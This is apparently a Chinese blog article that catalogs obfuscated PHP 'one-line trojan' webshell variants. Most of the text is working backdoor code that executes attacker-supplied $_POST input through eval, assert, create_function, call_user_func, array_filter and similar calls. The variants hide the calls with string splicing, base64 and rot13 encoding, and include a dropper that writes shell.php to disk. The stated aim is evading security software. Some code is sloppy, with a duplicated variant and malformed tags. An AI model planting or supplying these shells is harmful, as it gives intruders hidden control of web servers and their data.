一句话木马变形
介绍:网站后门,也可以叫做WebShell,黑客在入侵了一个网站后,通常会将一些asp或php文档与网 站服务器WEB目录下正常的网页文档混在一起,使得可以通过使用浏览器来访问这些asp或者php 文档,从而得到一个命令执行环境,最终达到控制网站服务器的目的(可以上传下载文档,查看 数据库,执行任意进程命令等)。这样的文档叫做后门。
下面整理了一下当前最常见的PHP后门:
最流行的一种后门叫做一句话木马,例如:
原理:
1.在PHP脚本语言中,eval或者assert(code)的功能是将code组合成php命令,然后将命令执行。
2.<?php $a=”phpinfo()”; eval(“echo $a; “);?>就相当于执行 echo phpinfo();语句。
优点:短小精悍,功能强大。
缺点:容易被安全软件检测出来。
为了增强隐蔽性,减小被检测的出来的概率,出现了各种一句话木马的变形。
下面是我做的几种测试,当然一句话的变形并不局限于以下,我们也可以传入文档,在用动态写入语句,在同级目录下创建一句话后门,比如:<?php fputs(fopen(“shell.php”,”w”),”<?php eval($_POST[‘cmd’]);?>”)?>
变形一
<?php
$a=str_replace("x", "", "axsxxxxsxexrt");
$a($_POST["cmd"]);
?>
变形二
<?php
$fun=create_function('',$_POST['a']);
$fun();
?>
变形三
<?php
@call_user_func(assert,$_POST['a']);
?>
变形四
<?php
@$test='<?php $a=$_POST["cmd"];assert($a); ?>';
file_put_contents("shell.php", $test);
?>
变形四
<?php
@call_user_func(assert,$_POST['a']);
?>
变形五
<?php
$a = "assert";
$a(@$_POST['a']);
?>
变形六
<?php
<?php
$__C_C="WlhaaGJDZ2tYMUJQVTFSYmVGMHBPdz09";
$__P_P="abcdefghijklmnopqrstuvwxyz";
$__X_X="123456789";
$__O_O=$__X_X[5].$__X_X[3]."_";
$__B_B=$__P_P{1}.$__P_P[0].$__P_P[18].$__P_P[4];
$__H_H=$__B_B.$__O_O.$__P_P[3].$__P_P[4].$__P_P[2].$__P_P[14].$__P_P[3].$__P_P[4];
$__E_E=$__P_P[4].$__P_P[21].$__P_P[0].$__P_P[11];
$__F_F=$__P_P[2].$__P_P[17].$__P_P[4].$__P_P[0].$__P_P[19].$__P_P[4];
$__F_F.='_'.$__P_P[5].$__P_P[20].$__P_P[13].$__P_P[2].$__P_P[19].$__P_P[8].$__P_P[14].$__P_P[13];
$_[00]=$__F_F('$__S_S',$__E_E.'("$__S_S");');
@$_[00]($__H_H($__H_H($__C_C)));
?>
//解码后即==> eval($_POST[x]);
?>
变形七
<?php
$a=str_replace("Waldo", "", "aWaldossert");
$a(@$_POST['a']);
?>
变形八
<?php
$_=base64_decode("YXNzZXJ0");
$_(str_rot13('riny($_CBFG[cntr]);'))
?>
变形九
<?php
$a="a"."s"."s";
$b="e"."r"."t";
$c=$a.$b;
$c($_POST['a'])
?>
变形十
<?php
$str="a=assert";
parse_str($str);
//$a=eval
$a($_POST['a']);
?>
变形十一
<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, $e);
?>